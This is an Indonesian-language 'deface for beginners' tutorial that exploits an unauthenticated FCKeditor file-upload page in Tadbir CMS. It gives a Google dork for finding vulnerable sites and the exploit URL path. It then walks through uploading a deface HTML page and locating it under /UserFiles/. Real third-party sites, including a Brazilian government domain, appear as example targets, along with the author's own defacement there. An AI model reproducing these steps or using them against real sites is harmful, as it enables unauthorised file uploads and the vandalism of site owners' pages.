Remote File Upload Exploit Vulnerabil tadbir CMS (fckeditor)

Tutorial Deface Untuk Pemula
simple tutor/exploit deface CMS upload file dri ane.....

 __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __
| Application Info:

| Name: Tadbir CMS
| Autor:Surabayag3tar
|__ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __
| Vulnerability Info:
| Type: Remote Arbitrary File Upload
| Risk: High
| Dork:coba2 aj...
| inurl:/editor/editor/filemanager/
|
| Exploit:http://target.com/editor/editor/filemanager/upload/test.html
|__ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __

dork diatas ^ isi kn d google, cri trget...klo dpt

ex:http://www.dircomext.com/

inject kn exploit ny d atas....
jdinya.......
ex : http://pedrapreta.mt.gov.br/editor/editor/filemanager/upload/test.html

pada [Select the "File Uploader" to use: ] <----- pilih PHP

trus upload html kmu.....
klik send it to server, kalo sukses or terapload maka pada kotak [Uploaded File URL:] akan memberikan patch dmn file kmu terupload

ex yg kluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html

maka hasil nya ada di http://target.com/UserFiles/html_kamu.html
mudah kn....hehehehehe
  ex hasil ane : http://pedrapreta.mt.gov.br/editor/images/Habibnoerq%201.html
 YG GK PUNYA HTML DEFACE SILAHKAN http://detoxhealth.co.uk/ CTRL+U
silahkan d coba n mdah2an bsa d mengerti...... :D:D

Thanks To Andre Pangestu